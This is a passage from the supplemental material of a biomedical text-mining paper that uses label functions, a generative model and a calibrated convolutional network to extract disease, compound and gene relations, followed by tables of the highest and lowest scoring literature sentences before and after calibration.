Yifan Peng, Anthony Rios, Ramakanth Kavuluru, Zhiyong Lu
Database (2018-01-01) https://doi.org/gf479f
DOI: 10.1093/database/bay073 · PMID: 30020437 · PMCID: PMC6051439
52. Extracting chemical–protein relations using attention-based neural networks
Sijia Liu, Feichen Shen, Ravikumar Komandur Elayavilli, Yanshan Wang, Majid Rastegar-Mojarad, Vipin Chaudhary, Hongfang Liu
Database (2018-01-01) https://doi.org/gfdz8d
DOI: 10.1093/database/bay102 · PMID: 30295724 · PMCID: PMC6174551
53. Chemical–gene relation extraction using recursive neural network
Sangrak Lim, Jaewoo Kang
Database (2018-01-01) https://doi.org/gdss6f
DOI: 10.1093/database/bay060 · PMID: 29961818 · PMCID: PMC6014134
54. Exploring Semi-supervised Variational Autoencoders for Biomedical Relation Extraction
Yijia Zhang, Zhiyong Lu
arXiv (2019-01-18) https://arxiv.org/abs/1901.06103v1
55. BioBERT: a pre-trained biomedical language representation model for biomedical text mining
Jinhyuk Lee, Wonjin Yoon, Sungdong Kim, Donghyeon Kim, Sunkyu Kim, Chan Ho So, Jaewoo Kang
Bioinformatics (2019-09-10) https://doi.org/ggh5qq
DOI: 10.1093/bioinformatics/btz682 · PMID: 31501885
56. Extraction of protein–protein interactions (PPIs) from the literature by deep convolutional neural networks with various feature embeddings
Sung-Pil Choi
Journal of Information Science (2016-11-01) https://doi.org/gcv8bn
DOI: 10.1177/0165551516673485
57. Deep learning for extracting protein-protein interactions from biomedical literature
Yifan Peng, Zhiyong Lu
arXiv (2017-06-05) https://arxiv.org/abs/1706.01556v2
58. Improving the learning of chemical-protein interactions from literature using transfer learning and specialized word embeddings
P Corbett, J Boyle
Database (2018-01-01) https://doi.org/gf479d
DOI: 10.1093/database/bay066 · PMID: 30010749 · PMCID: PMC6044291
59. Extraction of chemical-protein interactions from the literature using neural networks and narrow instance representation
Rui Antunes, Sérgio Matos
Database : the journal of biological databases and curation (2019-01) https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6796919/
60. Large-scale extraction of gene interactions from full-text literature using DeepDive
Emily K. Mallory, Ce Zhang, Christopher Ré, Russ B. Altman
Bioinformatics (2015-09-03) https://doi.org/gb5g7b
DOI: 10.1093/bioinformatics/btv476 · PMID: 26338771 · PMCID: PMC4681986
61. The new NHGRI-EBI Catalog of published genome-wide association studies (GWAS Catalog)
Jacqueline MacArthur, Emily Bowler, Maria Cerezo, Laurent Gil, Peggy Hall, Emma Hastings, Heather Junkins, Aoife McMahon, Annalisa Milano, Joannella Morales, … Helen Parkinson
Nucleic Acids Research (2016-11-29) https://doi.org/f9v7cp
DOI: 10.1093/nar/gkw1133 · PMID: 27899670 · PMCID: PMC5210590
62. DrugBank 5.0: a major update to the DrugBank database for 2018
David S Wishart, Yannick D Feunang, An C Guo, Elvis J Lo, Ana Marcu, Jason R Grant, Tanvir Sajed, Daniel Johnson, Carin Li, Zinat Sayeeda, … Michael Wilson
Nucleic Acids Research (2017-11-08) https://doi.org/gcwtzk
DOI: 10.1093/nar/gkx1037 · PMID: 29126136 · PMCID: PMC5753335
63. PubTator: a web-based text mining tool for assisting biocuration
Chih-Hsuan Wei, Hung-Yu Kao, Zhiyong Lu
Nucleic Acids Research (2013-05-22) https://doi.org/f475th
DOI: 10.1093/nar/gkt441 · PMID: 23703206 · PMCID: PMC3692066
64. DNorm: disease name normalization with pairwise learning to rank
R. Leaman, R. Islamaj Dogan, Z. Lu
Bioinformatics (2013-08-21) https://doi.org/f5gj9n
DOI: 10.1093/bioinformatics/btt474 · PMID: 23969135 · PMCID: PMC3810844
65. GeneTUKit: a software for document-level gene normalization
M. Huang, J. Liu, X. Zhu
Bioinformatics (2011-02-08) https://doi.org/dng2cb
DOI: 10.1093/bioinformatics/btr042 · PMID: 21303863 · PMCID: PMC3065680
66. Cross-species gene normalization by species inference
Chih-Hsuan Wei, Hung-Yu Kao
BMC Bioinformatics (2011-10-03) https://doi.org/dnmvds
DOI: 10.1186/1471-2105-12-s8-s5 · PMID: 22151999 · PMCID: PMC3269940
67. Collaborative biocuration–text-mining development task for document prioritization for curation
T. C. Wiegers, A. P. Davis, C. J. Mattingly
Database (2012-11-22) https://doi.org/gbb3zw
DOI: 10.1093/database/bas037 · PMID: 23180769 · PMCID: PMC3504477
68. A Proteome-Scale Map of the Human Interactome Network
Thomas Rolland, Murat Taşan, Benoit Charloteaux, Samuel J. Pevzner, Quan Zhong, Nidhi Sahni, Song Yi, Irma Lemmens, Celia Fontanillo, Roberto Mosca, … Marc Vidal
Cell (2014-11) https://doi.org/f3mn6x
DOI: 10.1016/j.cell.2014.10.050 · PMID: 25416956 · PMCID: PMC4266588
69. iRefIndex: A consolidated protein interaction database with provenance
Sabry Razick, George Magklaras, Ian M Donaldson
BMC Bioinformatics (2008) https://doi.org/b99bjj
DOI: 10.1186/1471-2105-9-405 · PMID: 18823568 · PMCID: PMC2573892
70. Uncovering disease-disease relationships through the incomplete interactome
J. Menche, A. Sharma, M. Kitsak, S. D. Ghiassian, M. Vidal, J. Loscalzo, A.-L. Barabasi
Science (2015-02-19) https://doi.org/f3mn6z
DOI: 10.1126/science.1257601 · PMID: 25700523 · PMCID: PMC4435741
71. Mining knowledge from MEDLINE articles and their indexed MeSH terms
Daniel Himmelstein, Alex Pankov
ThinkLab (2015-05-10) https://doi.org/f3mqwp
DOI: 10.15363/thinklab.d67
72. Integrating resources with disparate licensing into an open network
Daniel Himmelstein, Lars Juhl Jensen, MacKenzie Smith, Katie Fortney, Caty Chung
ThinkLab (2015-08-28) https://doi.org/bfmk
DOI: 10.15363/thinklab.d107
73. Legal confusion threatens to slow data science
Simon Oxenham
Nature (2016-08) https://doi.org/bndt
DOI: 10.1038/536016a · PMID: 27488781
74. An analysis and metric of reusable data licensing practices for biomedical resources
Seth Carbon, Robin Champieux, Julie A. McMurry, Lilly Winfree, Letisha R. Wyatt, Melissa A. Haendel
PLOS ONE (2019-03-27) https://doi.org/gf5m8v
DOI: 10.1371/journal.pone.0213090 · PMID: 30917137 · PMCID: PMC6436688
75. Snorkel MeTaL
Alex Ratner, Braden Hancock, Jared Dunnmon, Roger Goldman, Christopher Ré
Proceedings of the Second Workshop on Data Management for End-To-End Machine Learning - DEEM’18 (2018) https://doi.org/gf3xk7
DOI: 10.1145/3209889.3209898 · PMID: 30931438 · PMCID: PMC6436830
76. Snorkel
Alexander Ratner, Stephen H. Bach, Henry Ehrenberg, Jason Fries, Sen Wu, Christopher Ré
Proceedings of the VLDB Endowment (2017-11-01) https://doi.org/ch44
DOI: 10.14778/3157794.3157797 · PMID: 29770249 · PMCID: PMC5951191
77. A Sensitivity Analysis of (and Practitioners’ Guide to) Convolutional Neural Networks for Sentence Classification
Ye Zhang, Byron Wallace
arXiv (2015-10-13) https://arxiv.org/abs/1510.03820v4
78. Adam: A Method for Stochastic Optimization
Diederik P. Kingma, Jimmy Ba
arXiv (2014-12-22) https://arxiv.org/abs/1412.6980v9
79. Distributed Representations of Words and Phrases and their Compositionality
Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg Corrado, Jeffrey Dean
arXiv (2013-10-16) https://arxiv.org/abs/1310.4546v1
80. Enriching Word Vectors with Subword Information
Piotr Bojanowski, Edouard Grave, Armand Joulin, Tomas Mikolov
arXiv (2016-07-15) https://arxiv.org/abs/1607.04606v2
81. Efficient Estimation of Word Representations in Vector Space
Tomas Mikolov, Kai Chen, Greg Corrado, Jeffrey Dean
arXiv (2013-01-16) https://arxiv.org/abs/1301.3781v3
82. On Calibration of Modern Neural Networks
Chuan Guo, Geoff Pleiss, Yu Sun, Kilian Q. Weinberger
arXiv (2017-06-14) https://arxiv.org/abs/1706.04599v2
83. Accurate Uncertainties for Deep Learning Using Calibrated Regression
Volodymyr Kuleshov, Nathan Fenner, Stefano Ermon
arXiv (2018-07-01) https://arxiv.org/abs/1807.00263v1
## Supplemental Methods
#### Label Function Categories
Label functions can be constructed in a multitude of ways; however, many label functions share similar characteristics with one another. We grouped these characteristics into the following categories: databases, text patterns and domain heuristics. Most of our label functions fall into the text pattern category, while the others were distributed across the database and domain heuristic categories (Supplemental Table 1). Further, we described each category and provided an example that refers to the following candidate sentence: “PTK6 may be a novel therapeutic target for pancreatic cancer”.
Databases: These label functions incorporate existing databases to generate a signal, as seen in distant supervision [4]. These functions detect if a candidate sentence’s co-mention pair is present in a given database. If the pair is present, our label function emits a positive label and abstains otherwise. If the pair is not present in any existing database, a separate label function emits a negative label. We used a separate label function to prevent a label imbalance problem that we encountered during development: emitting positives and negatives from the same label function causes downstream classifiers to generate almost exclusively negative predictions.
$\Lambda_{DB}(\color{#875442}{D}, \color{#02b3e4}{G}) = \begin{cases} 1 & (\color{#875442}{D}, \color{#02b3e4}{G}) \in DB \\ 0 & otherwise \\ \end{cases}$
$\Lambda_{\neg DB}(\color{#875442}{D}, \color{#02b3e4}{G}) = \begin{cases} -1 & (\color{#875442}{D}, \color{#02b3e4}{G}) \notin DB \\ 0 & otherwise \\ \end{cases}$
Domain Heuristics: These label functions used results from published text-based analyses to generate a signal. For our project, we used dependency path cluster themes generated by Percha et al. [31]. If a candidate sentence’s dependency path belonged to a previously generated cluster, then the label function emitted a positive label and abstained otherwise.
$\Lambda_{DH}(\color{#875442}{D}, \color{#02b3e4}{G}) = \begin{cases} 1 & Candidate \> Sentence \in Cluster \> Theme\\ 0 & otherwise \\ \end{cases}$
Text Patterns: These label functions are designed to use keywords and sentence context to generate a signal. For example, a label function could focus on the number of words between two mentions or focus on the grammatical structure of a sentence. These functions emit a positive or negative label depending on the context.
$\Lambda_{TP}(\color{#875442}{D}, \color{#02b3e4}{G}) = \begin{cases} 1 & "target" \> \in Candidate \> Sentence \\ 0 & otherwise \\ \end{cases}$
$\Lambda_{TP}(\color{#875442}{D}, \color{#02b3e4}{G}) = \begin{cases} -1 & "VB" \> \notin pos\_tags(Candidate \> Sentence) \\ 0 & otherwise \\ \end{cases}$
Each text pattern label function was constructed by manual examination of sentences within the training set. For example, in the candidate sentence above, one would extract the keywords “novel therapeutic target” and incorporate them in a text pattern label function. After initial construction, we tested and augmented the label function using sentences in the tune set. We repeated this process for every label function in our repertoire.
Table 1: The distribution of each label function per relationship.
Relationship Databases (DB) Text Patterns (TP) Domain Heuristics (DH)
DaG 7 20 10
CtD 3 15 7
CbG 9 13 7
GiG 9 20 8
### Training Models
#### Generative Model
The generative model is a core part of this automatic annotation framework. It integrates multiple signals emitted by label functions and assigns a training class to each candidate sentence. This model assigns training classes by estimating the joint probability distribution of the latent true class ($$Y$$) and label function signals ($$\Lambda$$), ($$P_{\theta}(\Lambda, Y)$$). Assuming each label function is conditionally independent, the joint distribution is defined as follows:
$P_{\theta}(\Lambda, Y) = \frac{\exp(\sum_{i=1}^{m} \theta^{T}F_{i}(\Lambda, y))} {\sum_{\Lambda'}\sum_{y'} \exp(\sum_{i=1}^{m} \theta^{T}F_{i}(\Lambda', y'))}$
where $$m$$ is the number of candidate sentences, $$F$$ is the vector of summary statistics and $$\theta$$ is a vector of weights for each summary statistic. The summary statistics used by the generative model are as follows:
$F^{Lab}_{i,j}(\Lambda, Y) = \unicode{x1D7D9}\{\Lambda_{i,j} \neq 0\}$ $F^{Acc}_{i,j}(\Lambda, Y) = \unicode{x1D7D9}\{\Lambda_{i,j} = y_{i,j}\}$
Lab is the label function’s propensity (the frequency of a label function emitting a signal). Acc is the individual label function’s accuracy given the training class. This model optimizes the weights ($$\theta$$) by minimizing the negative log likelihood:
$\hat{\theta} = argmin_{\theta} -\sum_{\Lambda} \sum_{Y} log P_{\theta}(\Lambda, Y)$
In the framework we used predictions from the generative model, $$\hat{Y} = P_{\hat{\theta}}(Y \mid \Lambda)$$, as training classes for our dataset [75,76].
#### Discriminative Model
The discriminative model is a neural network trained to produce classification labels by integrating predicted probabilities from the generative model along with sentence representations via word embeddings. The goal of this combined approach is to develop models that learn text features associated with the overall task, beyond the supplied label functions. We used a piecewise convolutional neural network that contains multiple kernel filters as our discriminative model. We built a network with multiple filters using a fixed width of 300 (size of word embeddings) and a fixed height of 7 (Figure 4). We chose a fixed height of 7 because this height was previously reported to optimize performance in relationship classification [77]. We trained this model for 15 epochs using the Adam optimizer [78] with PyTorch’s default parameter settings and a learning rate of 0.001 that decreases by half every epoch until the lower bound of 1e-5 is reached, which we observed was often sufficient for convergence. We added a L2 penalty (lambda=0.002) on the network weights to prevent overfitting. Lastly, we added a dropout layer (p=0.25) between the fully connected layer and the softmax layer.
#### Word Embeddings
Word embeddings are representations that map individual words to real valued vectors of user-specified dimensions. These embeddings have been shown to capture the semantic and syntactic information between words [79]. We trained Facebook’s fastText [80] using all candidate sentences for each individual relationship pair to generate word embeddings. FastText uses a skip-gram model [81] that aims to predict the surrounding context for a candidate word and pairs the model with a novel scoring function that treats each word as a bag of character n-grams. We trained this model for 20 epochs using a window size of 2 and generated 300-dimensional word embeddings. We use the optimized word embeddings as input to our discriminative model.
#### Calibration of the Discriminative Model
Often many tasks require a machine learning model to output reliable probability predictions. A model is well calibrated if the probabilities emitted from the model match the observed probabilities. For example, a well-calibrated model that assigns a class label with 80% probability should have that class appear 80% of the time. Deep neural network models can often be poorly calibrated [82,83]. These models are usually over-confident in their predictions. For this reason, we calibrated our convolutional neural network using temperature scaling [82]. Temperature scaling uses a parameter T to scale each value of the logit vector (z) before being passed into the softmax (SM) function.
$\sigma_{SM}(\frac{z_{i}}{T}) = \frac{\exp(\frac{z_{i}}{T})}{\sum_{i}\exp(\frac{z_{i}}{T})}$
We found the optimal T by minimizing the negative log likelihood (NLL) of the tune set.
## Supplemental Figures
### Discriminative Model Calibration
Even deep learning models with impressive AUROC and AUPR statistics can be subject to poor calibration. Typically, these models are overconfident in their predictions [82,83]. We attempted to use temperature scaling to fix the calibration of the best performing discriminative models (Figure 9). Before calibration (green lines), our models were aligned with the ideal calibration only when predicting low probability scores (close to 0.25). Applying the temperature scaling calibration algorithm (blue lines) did not substantially improve the calibration of the model in most cases. The exception to this pattern is the Disease associates Gene (DaG) model where high confidence scores are shown to be better calibrated. Overall, calbrating deep learning models is a nontrivial task that requires more complex approaches to accomplish.
### Text Mined Edges Can Expand a Database-derived Knowledge Graph
One of the goals in our work is to measure the extent to which learning multiple edge types could construct a biomedical knowledge graph. Using Hetionet v1 as an evaluation set, we measured this framework’s recall and quantified how many new edges could be added with high confidence. Overall, we were able to recall more than half of preexisting edges for all edge types (Figure 10) and report our top ten scoring sentences for each edge type in Supplemental Table 11. Our best recall is with the Compound treats Disease (CtD) edge type, where we retain 85% of preexisting edges. Plus, we can add over 6,000 new edges to that category. In contrast, we could only recall close to 70% of existing edges for the other categories; however, we can add over 40,000 novel edges to each category. This highlights the fact that Hetionet v1 is missing a compelling amount of biomedical information and this framework is a viable way to close the information gap.
### Comparison with CoCoScore using Hetionet v1 as an Evaluation Set
Our model showed promising performance in terms of recalling edges in Hetionet v1. We assessed our model’s performance relative to a recently published method [30]. Though our method is primarily designed to predict assertions, not edges, we compared performance at an edge level because this was available for CoCoScore. We found that a simple summary approach, max sentence score, provided comparable performance to the CoCoScore for the compound treats disease (CtD) edge type and slightly poorer performance for other edge types (Supplemental Figure 11). Sentence-level scores can be integrated in multiple ways, and approaches that consider more complexity (e.g., the number of sentences with high-probability) should be evaluated in future work.
## Supplemental Tables
### Distribution of Candidate Sentences
Table 2: Statistics of Candidate Sentences. We sorted each candidate sentence into a training, tuning and testing set. Numbers in parentheses show the number of positives and negatives that resulted from the hand-labeling process.
Relationship Train Tune Test
Disease Associates Gene 2.35 M 31K (397+, 603-) 313K (351+, 649-)
Compound Binds Gene 1.7M 468K (37+, 463-) 227k (31+, 469-)
Compound Treats Disease 1.013M 96K (96+, 404-) 32K (112+, 388-)
Gene Interacts Gene 12.6M 1.056M (60+, 440-) 257K (76+, 424-)
### Discriminative Model Calibration Tables
Table 3: Contains the top ten Disease-associates-Gene confidence scores before and after model calbration. Disease mentions are highlighted in brown and Gene mentions are highlighted in blue.
Disease Name Gene Symbol Text Before Calibration After Calibration
prostate cancer DKK1 conclusion : high dkk-1 serum levels are associated with a poor survival in patients with prostate cancer . 0.999 0.916
breast cancer ERBB2 conclusion : her-2 / neu overexpression in primary breast carcinoma is correlated with patients ’ age ( under age 50 ) and calcifications at mammography . 0.998 0.906
breast cancer ERBB2 the results of multiple linear regression analysis , with her2 as the dependent variable , showed that family history of breast cancer was significantly associated with elevated her2 levels in the tumors ( p = 0.0038 ) , after controlling for the effects of age , tumor estrogen receptor , and dna index . 0.998 0.904
colon cancer SP3 ba also decreased expression of sp1 , sp3 and sp4 transcription factors which are overexpressed in colon cancer cells and decreased levels of several sp-regulated genes including survivin , vascular endothelial growth factor , p65 sub-unit of nfkb , epidermal growth factor receptor , cyclin d1 , and pituitary tumor transforming gene-1 . 0.998 0.902
breast cancer ERBB2 in breast cancer , overexpression of her2 is associated with an aggressive tumor phenotype and poor prognosis . 0.998 0.898
breast cancer BCL2 in clinical breast cancer samples , high bcl2 expression was associated with poor prognosis . 0.997 0.886
adrenal gland cancer TP53 the mechanisms of adrenal tumorigenesis remain poorly established ; the r337h germline mutation in the p53 gene has previously been associated with acts in brazilian children . 0.996 0.883
prostate cancer AR the androgen receptor was expressed in all primary and metastatic prostate cancer tissues and no mutations were identified . 0.996 0.881
urinary bladder cancer PIK3CA conclusions : increased levels of fgfr3 and pik3ca mutated dna in urine and plasma are indicative of later progression and metastasis in bladder cancer . 0.995 0.866
ovarian cancer EPAS1 the log-rank test showed that nuclear positive immunostaining for hif-1alpha ( p = .002 ) and cytoplasmic positive immunostaining for hif-2alpha ( p = .0112 ) in tumor cells are associated with poor prognosis of patients with ovarian carcinoma . 0.994 0.86
Table 4: Contains the bottom ten Disease-associates-Gene confidence scores before and after model calbration. Disease mentions are highlighted in brown and Gene mentions are highlighted in blue.
Disease Name Gene Symbol Text Before Calibration After Calibration
endogenous depression EP300 from a clinical point of view , p300 amplitude should be considered as a psychophysiological index of suicidal risk in major depressive disorder . 0.202 0.379
Alzheimer’s disease PDK1 from prion diseases to alzheimer ’s disease : a common therapeutic target , [pdk1 ] . 0.2 0.378
endogenous depression HTR1A gepirone , a selective serotonin ( 5ht1a ) partial agonist in the treatment of major depression . 0.199 0.378
Gilles de la Tourette syndrome FGF9 there were no differences in gender distribution , age at tic onset or td diagnosis , tic severity , proportion with current diagnoses of ocd/oc behavior or attention deficit hyperactivity disorder ( adhd ) , cbcl internalizing , externalizing , or total problems scores , ygtss scores , or gaf scores . 0.185 0.37
hematologic cancer MLANA methods : the sln sections ( n = 214 ) were assessed by qrt assay for 4 established messenger rna biomarkers : mart-1 , mage-a3 , galnac-t , and pax3 . 0.18 0.368
endogenous depression MAOA alpha 2-adrenoceptor responsivity in depression : effect of chronic treatment with moclobemide , a selective mao-a-inhibitor , versus maprotiline . 0.179 0.367
chronic kidney failure B2M to evaluate comparative beta 2-m removal we studied six stable end-stage renal failure patients during high-flux 3-h haemodialysis , haemodia-filtration , and haemofiltration , using acrylonitrile , cellulose triacetate , polyamide and polysulphone capillary devices . 0.178 0.366
hematologic cancer C7 serum antibody responses to four haemophilus influenzae type b capsular polysaccharide-protein conjugate vaccines ( prp-d , hboc , c7p , and prp-t ) were studied and compared in 175 infants , 85 adults and 140 2-year-old children . 0.174 0.364
hypertension AVP portohepatic pressures , hepatic function , and blood gases in the combination of nitroglycerin and vasopressin : search for additive effects in cirrhotic portal hypertension . 0.168 0.361
endogenous depression GAD1 within-individual deflections in gad , physical , and social symptoms predicted later deflections in depressive symptoms , and deflections in depressive symptoms predicted later deflections in gad and separation anxiety symptoms . 0.149 0.349
Table 5: Contains the top ten Compound-treats-Disease confidence scores after model calbration. Disease mentions are highlighted in brown and Compound mentions are highlighted in red.
Compound Name Disease Name Text Before Calibration After Calibration
Prazosin hypertension experience with prazosin in the treatment of hypertension . 0.997 0.961
Methyldopa hypertension oxprenolol plus cyclopenthiazide-kcl versus methyldopa in the treatment of hypertension . 0.997 0.961
Methyldopa hypertension atenolol and methyldopa in the treatment of hypertension . 0.996 0.957
Prednisone asthma prednisone and beclomethasone for treatment of asthma . 0.995 0.953
Sulfasalazine ulcerative colitis sulphasalazine , used in the treatment of ulcerative colitis , is cleaved in the colon by the metabolic action of colonic bacteria on the diazo bond to release 5-aminosalicylic acid ( 5-asa ) and sulpharidine . 0.994 0.949
Prazosin hypertension letter : prazosin in treatment of hypertension . 0.994 0.949
Methylprednisolone asthma use of tao without methylprednisolone in the treatment of severe asthma . 0.994 0.948
Budesonide asthma thus , a regimen of budesonide treatment that consistently attenuates bronchial responsiveness in asthmatic subjects had no effect in these men ; larger and longer trials will be required to establish whether a subgroup of smokers shows a favorable response . 0.994 0.946
Methyldopa hypertension pressor and chronotropic responses to bilateral carotid occlusion ( bco ) and tyramine were also markedly reduced following treatment with methyldopa , which is consistent with the clinical findings that chronic methyldopa treatment in hypertensive patients impairs cardiovascular reflexes . 0.994 0.946
Fluphenazine schizophrenia low dose fluphenazine decanoate in maintenance treatment of schizophrenia . 0.994 0.946
Table 6: Contains the bottom ten Compound-treats-Disease confidence scores before and after model calbration. Disease mentions are highlighted in brown and Compound mentions are highlighted in red.
Compound Name Disease Name Text Before Calibration After Calibration
Indomethacin hypertension effects of indomethacin in rabbit renovascular hypertension . 0.033 0.13
Alprazolam panic disorder according to logistic regression analysis , the relationships between plasma alprazolam concentration and response , as reflected by number of panic attacks reported , phobia ratings , physicians ’ and patients ’ ratings of global improvement , and the emergence of side effects , were significant . 0.03 0.124
Mestranol polycystic ovary syndrome the binding capacity of plasma testosterone-estradiol-binding globulin ( tebg ) and testosterone ( t ) levels were measured in four women with proved polycystic ovaries and three women with a clinical diagnosis of polycystic ovarian disease before , during , and after administration of norethindrone , 2 mg. , and mestranol , 0.1 mg . 0.03 0.123
Creatine coronary artery disease during successful and uncomplicated angioplasty ( ptca ) , we studied the effect of a short lasting myocardial ischemia on plasma creatine kinase , creatine kinase mb-activity , and creatine kinase mm-isoforms ( mm1 , mm2 , mm3 ) in 23 patients . 0.028 0.12
Creatine coronary artery disease in 141 patients with acute myocardial infarction , creatine phosphokinase isoenzyme ( cpk-mb ) was determined by the activation method with dithiothreitol ( rao et al. : clin . 0.027 0.117
Morphine brain cancer the tissue to serum ratio of morphine in the hypothalamus , hippocampus , striatum , midbrain and cortex were also smaller in morphine tolerant than in non-tolerant rats . 0.026 0.115
Glutathione anemia our results suggest that an association between gsh px deficiency and hemolytic anemia need not represent a cause-and-effect relationship . 0.026 0.114
Dinoprostone stomach cancer prostaglandin e2 ( pge2 ) - and 6-keto-pgf1 alpha-like immunoactivity was measured in incubates of forestomach and gastric corpus mucosa in ( a ) unoperated rats , ( b ) rats with sham-operation of the kidneys and ( c ) rats with bilateral nephrectomy . 0.023 0.107
Creatine coronary artery disease the value of the electrocardiogram in assessing infarct size was studied using serial estimates of the mb isomer of creatine kinase ( ck mb ) in plasma , serial 35 lead praecordial maps in 28 patients with anterior myocardial infarction , and serial 12 lead electrocardiograms in 17 patients with inferior myocardial infarction . 0.022 0.105
Sulfamethazine multiple sclerosis quantitation and confirmation of sulfamethazine residues in swine muscle and liver by lc and gc/ms . 0.017 0.093
Table 7: Contains the top ten Compound-binds-Gene confidence scores before and after model calbration. Gene mentions are highlighted in blue and Compound mentions are highlighted in red.
Compound Name Gene Symbol Text Before Calibration After Calibration
Cyclic Adenosine Monophosphate B3GNT2 in sk-n-mc human neuroblastoma cells , the camp response to 10 nm isoproterenol ( iso ) is mediated primarily by beta 1-adrenergic receptors . 0.903 0.93
Indomethacin AGT indomethacin , a potent inhibitor of prostaglandin synthesis , is known to increase the maternal blood pressure response to angiotensin ii infusion . 0.894 0.922
Tretinoin RXRA the vitamin a derivative retinoic acid exerts its effects on transcription through two distinct classes of nuclear receptors , the retinoic acid receptor ( rar ) and the retinoid x receptor ( rxr ) . 0.882 0.912
Tretinoin RXRA the vitamin a derivative retinoic acid exerts its effects on transcription through two distinct classes of nuclear receptors , the retinoic acid receptor ( rar ) and the retinoid x receptor ( rxr ) . 0.872 0.903
D-Tyrosine CSF1 however , the extent of gap tyrosine phosphorylation induced by csf-1 was approximately 10 % of that induced by pdgf-bb in the nih3t3 fibroblasts . 0.851 0.883
D-Glutamic Acid GLB1 thus , the negatively charged side chain of glu-461 is important for divalent cation binding to beta-galactosidase . 0.849 0.882
D-Tyrosine CD4 second , we use the same system to provide evidence that the physical association of cd4 with the tcr is required for effective tyrosine phosphorylation of the tcr zeta-chain subunit , presumably reflecting delivery of p56lck ( lck ) to the tcr . 0.825 0.859
Calcium Chloride TNC the possibility that the enhanced length dependence of ca2 + sensitivity after cardiac tnc reconstitution was attributable to reduced tnc binding was excluded when the length dependence of partially extracted fast fibres was reduced to one-half the normal value after a 50 % deletion of the native tnc . 0.821 0.855
Metoprolol KCNMB2 studies in difi cells of the displacement of specific 125i-cyp binding by nonselective ( propranolol ) , beta 1-selective ( metoprolol and atenolol ) , and beta 2-selective ( ici 118-551 ) antagonists revealed only a single class of beta 2-adrenergic receptors . 0.82 0.854
D-Tyrosine PLCG1 epidermal growth factor ( egf ) or platelet-derived growth factor binding to their receptor on fibroblasts induces tyrosine phosphorylation of plc gamma 1 and stable association of plc gamma 1 with the receptor protein tyrosine kinase . 0.818 0.851
Table 8: Contains the bottom ten Compound-binds-Gene confidence scores before and after model calbration. Gene mentions are highlighted in blue and Compound mentions are highlighted in red.
Compound Name Gene Symbol Text Before Calibration After Calibration
Deferoxamine TF the mechanisms of fe uptake have been characterised using 59fe complexes of citrate , nitrilotriacetate , desferrioxamine , and 59fe added to eagle ’s minimum essential medium ( mem ) and compared with human transferrin ( tf ) labelled with 59fe and iodine-125 . 0.02 0.011
Hydrocortisone GH1 group iv patients had normal basal levels of lh and normal lh , gh and cortisol responses . 0.02 0.011
Carbachol INS at the same concentration , however , iapp significantly ( p less than 0.05 ) inhibited carbachol-stimulated ( 10 ( -7 ) m ) release of insulin by 30 % , and cgrp significantly inhibited carbachol-stimulated release of insulin by 33 % when compared with the control group . 0.02 0.011
Adenosine ME2 at physiological concentrations , atp , adp , and amp all inhibit the enzyme from atriplex spongiosa and panicum miliaceum ( nad-me-type plants ) , with atp the most inhibitory species . 0.019 0.01
Naloxone POMC specifically , opioids , including 2-n-pentyloxy-2-phenyl-4-methyl-morpholine , naloxone , and beta-endorphin , have been shown to interact with il-2 receptors ( 134 ) and regulate production of il-1 and il-2 ( 48-50 , 135 ) . 0.018 0.01
Cortisone acetate POMC sarcoidosis therapy with cortisone and acth – the role of acth therapy . 0.017 0.009
Epinephrine INS thermogenic effect of thyroid hormones : interactions with epinephrine and insulin . 0.017 0.009
Aldosterone KNG1 important vasoconstrictor , fluid - and sodium-retaining factors are the renin-angiotensin-aldosterone system , sympathetic nerve activity , and vasopressin ; vasodilator , volume , and sodium-eliminating factors are atrial natriuretic peptide , vasodilator prostaglandins like prostacyclin and prostaglandin e2 , dopamine , bradykinin , and possibly , endothelial derived relaxing factor ( edrf ) . 0.016 0.008
D-Leucine POMC cross-reactivities of leucine-enkephalin and beta-endorphin with the eia were less than 0.1 % , while that with gly-gly-phe-met and oxidized gly-gly-phe-met were 2.5 % and 10.2 % , respectively . 0.011 0.005
Estriol LGALS1 [ diagnostic value of serial determination of estriol and hpl in plasma and of total estrogens in 24-h-urine compared to single values for diagnosis of fetal danger ] . 0.01 0.005
Table 9: Contains the top ten Gene-interacts-Gene confidence scores before and after model calbration. Both gene mentions highlighted in blue.
Gene1 Symbol Gene2 Symbol Text Before Calibration After Calibration
ESR1 HSP90AA1 previous studies have suggested that the 90-kda heat shock protein ( hsp90 ) interacts with the er , thus stabilizing the receptor in an inactive state . 0.812 0.864
TP53 TP73 cyclin g interacts with p53 as well as p73 , and its binding to p53 or p73 presumably mediates downregulation of p53 and p73 . 0.785 0.837
TP53 AKT1 treatment of c81 cells with ly294002 resulted in an increase in the p53-responsive gene mdm2 , suggesting a role for akt in the tax-mediated regulation of p53 transcriptional activity . 0.773 0.825
ABCB1 NR1I3 valproic acid induces cyp3a4 and mdr1 gene expression by activation of constitutive androstane receptor and pregnane x receptor pathways . 0.762 0.813
PTH2R PTH2 thus , the juxtamembrane receptor domain specifies the signaling and binding selectivity of tip39 for the pth2 receptor over the pth1 receptor . 0.761 0.812
CCND1 ABL1 synergy with v-abl depended on a motif in cyclin d1 that mediates its binding to the retinoblastoma protein , suggesting that abl oncogenes in part mediate their mitogenic effects via a retinoblastoma protein-dependent pathway . 0.757 0.808
CTNND1 CDH1 these complexes are formed independently of ddr1 activation and of beta-catenin and p120-catenin binding to e-cadherin ; they are ubiquitous in epithelial cells . 0.748 0.798
CSF1 CSF1R this is in agreement with current thought that the c-fms proto-oncogene product functions as the csf-1 receptor specific to this pathway . 0.745 0.795
EZR CFTR without ezrin binding , the cytoplasmic tail of cftr only interacts strongly with the first amino-terminal pdz domain to form a 1:1 c-cftr . 0.732 0.78
SRC PIK3CG we have demonstrated that the sh2 ( src homology 2 ) domains of the 85 kda subunit of pi-3k are sufficient to mediate binding of the pi-3k complex to tyrosine phosphorylated , but not non-phosphorylated il-2r beta , suggesting that tyrosine phosphorylation is an integral component of the activation of pi-3k by the il-2r . 0.731 0.78
Table 10: Contains the bottom ten Gene-interacts-Gene confidence scores before and after model calbration. Both gene mentions highlighted in blue.
Gene1 Symbol Gene2 Symbol Text Before Calibration After Calibration
AGTR1 ACE result ( s ) : the luteal tissue is the major site of ang ii , ace , at1r , and vegf , with highest staining intensity found during the midluteal phase and at pregnancy . 0.009 0.003
